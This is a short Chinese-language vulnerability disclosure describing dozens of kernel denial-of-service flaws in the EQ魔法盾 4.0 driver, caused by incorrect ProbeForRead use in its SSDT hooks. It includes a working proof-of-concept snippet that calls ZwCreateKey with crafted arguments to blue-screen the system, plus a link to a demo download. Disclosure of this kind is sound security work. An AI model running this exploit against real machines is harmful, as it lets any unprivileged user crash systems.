EQ魔法盾 4.0增强版(version:20080902及以下)多处内核拒绝服务漏洞
作者:MJ0011
EQ魔法盾的驱动程序员对用户态参数检查有一定概念,可惜没有正确理解ProbeForRead的用法,导致几乎所有的SSDT HOOK函数都存在用户态检查不正确的问题,漏洞多达数十处。
此漏洞可导致任意用户权限的程序可以在安装了EQ魔法盾的系统上引发蓝屏
出问题的组件:EQSysSecure.sys ,版本:2008.9.1.26 CheckSum = 0x0001EFD3 TimeStamp = 0x48BAC155
EQ魔法盾的驱动中有这样一个函数 :偏移608d处 sub_16c8d
该函数处于一个带Try..Except的结构中,使用ProbeForRead来检查参数
检查完毕后即直接用户态参数,而实际上,如果传入用户态无效地址,ProbeForRead是不会产生任何反应的,因此读写用户态缓存的代码也必须置于结构化异常处理之中。
这个问题存在于EQ的大部分HOOK函数中,有几十处之多,这里只举出一个例子:
ZwCreateKey,下面是测试代码,运行此代码后安装了EQ魔法盾的系统上即会引发蓝屏重启:
HMODULE hlib = LoadLibrary(“ntdll.dll”);
PVOID p = GetProcAddress(hlib , “ZwCreateKey”);
__asm{
push 0
push 0
push 0
push 0
push 1
push 0
push 0
call p
}
测试程序下载:http://mj0011.ys168.com ,漏洞演示下BSOD_EQ.rar